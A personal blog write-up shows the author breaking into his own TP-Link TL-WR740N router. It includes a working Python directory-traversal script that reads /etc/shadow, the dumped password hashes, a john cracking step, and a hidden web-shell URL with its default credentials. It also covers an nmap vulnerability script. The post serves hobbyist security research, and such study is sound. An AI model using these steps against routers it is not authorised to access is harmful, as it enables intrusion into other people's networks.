Hacking into TP-Link (TL-WR740N)

I have a TL-WR740N router (it is an old one), that I was trying to gain access to its firmware which I think it is OpenWRT, but nmap reports that it is TP-Link WAP… so idk (yet)! I scanned the ports hoping to find an open Telnet or SSH port (ZTE router has TELNET port opened by the way!!!) but they are not, here is my primary scan:

# nmap -sT 192.168.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

SO … I went to test the graphical inteface (web interface of the router on http://192.168.0.1/), here how the page looks like:

TPLINK00

A little about the interface, I checked the source code and found out that the webpage uses tags to load the site content.

<FRAMESET cols=160,55%,*>
<FRAMESET rows=72,* frameSpacing=0 frameBorder=0>
<FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no>
<FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize>
</FRAMESET>
<FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0>
<FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1>
</FRAMESET>

I made a list of the available directories/paths:

So now I have to check for directory traversal vulnerability (and I found it).

I don’t know how many directories I needed to jump back to reach for /etc/shadow file (or /etc/passwd), I may have to test (using hackbar plugin maybe) a payload like this: http://192.168.0.1/images/../../../etc/shadow.

Something to notice here, that urllib – that I used to download the html pages – will return an error “IOError: (‘http protocol error’, 0, ‘got a bad status line’, None)” and exit if the target url is not … an html file (I think), I really don’t care about this as I personally don’t use urllib anymore (I switched to mechanize a while ago) but… anyway (this is just a notice)!

My full script:

import urllib
import time

depth = 5
host = 'http://192.168.0.1/'
path = '../'
target = 'etc/shadow'

htmltext = ''
fullpath = ''
limit = 0

directories = ['', 'frames/', 'images/','help/']

for i in range(1,depth):
        fullpath += path
        for directory in directories:
                url = host + directory + fullpath + target
                print "Testing: ", url
                try:
                        htmltext = urllib.urlopen(url).read()
                except:
                        pass
                if ("root" in htmltext):
                        print url, " is vulnerable"
                else:
                        time.sleep(2)
                        continue

The program (more precisely urllib) will prompt for user/password, the default username and password for TL-W740N router is admin/admin.

The output:

Testing:  http://192.168.0.1/../etc/shadow
Testing:  http://192.168.0.1/frames/../etc/shadow
Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
Testing:  http://192.168.0.1/images/../etc/shadow
Testing:  http://192.168.0.1/help/../etc/shadow
Testing:  http://192.168.0.1/../../etc/shadow
Testing:  http://192.168.0.1/frames/../../etc/shadow
http://192.168.0.1/frames/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/images/../../etc/shadow
http://192.168.0.1/images/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/help/../../etc/shadow
http://192.168.0.1/help/../../etc/shadow  is vulnerable

So … if you run this script with -i option (pyhon -i ) you will end in the interactive mode (good for debugging), so I checked the value of htmltext and what do you know

>>> print htmltext
TL-WR740N

//
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

Not bad so far! So now what?

I copied the line that has root account in it to a file and named it root.password, and using john:

john --show root.password

I got the password, it is 5up (default password I guess)

Anyway… now what? (this is REALLY interesting)

Well… I did my research, and this is what I found:

Some TP-Link routers has a hidden web shell, that you can access using this url:
http://192.168.0.1/userRpmNatDebugRpm26525557/linux_cmdline.html

The user name is osteam, and the password is 5up, here how this interface looks like:

TPLINK01

And there is a nmap script actually to test this vulnerability in TP-Link routers

nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
Nmap scan report for 192.168.0.1
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

By the way… I mirrored the website using webhttrack (httrack) but I didn’t get anythig interesting… but when using the web shell, I went to the web directory and there is a folder names “userRpm” and there I found lots of interesting files, I am still digging into this router (I want to see if I can upload a file or add new commands maybe!)

Anyway…

Conclusion

TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured … in fact you should be careful with the router you are using and double check and test it for security.

[note]: this is VERY interesting video about hacking routers (I applied that method on ZTE router and got great results)

Thanks

Advertisements

9 thoughts on “Hacking into TP-Link (TL-WR740N)

  1. Hi, Legeti. Does this issue fixed or it’s still possible to hack TL-WR740N router? I have use same router TL-WR740N and Firmware Version is: 3.16.9 Build 141113 Rel.61554n

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s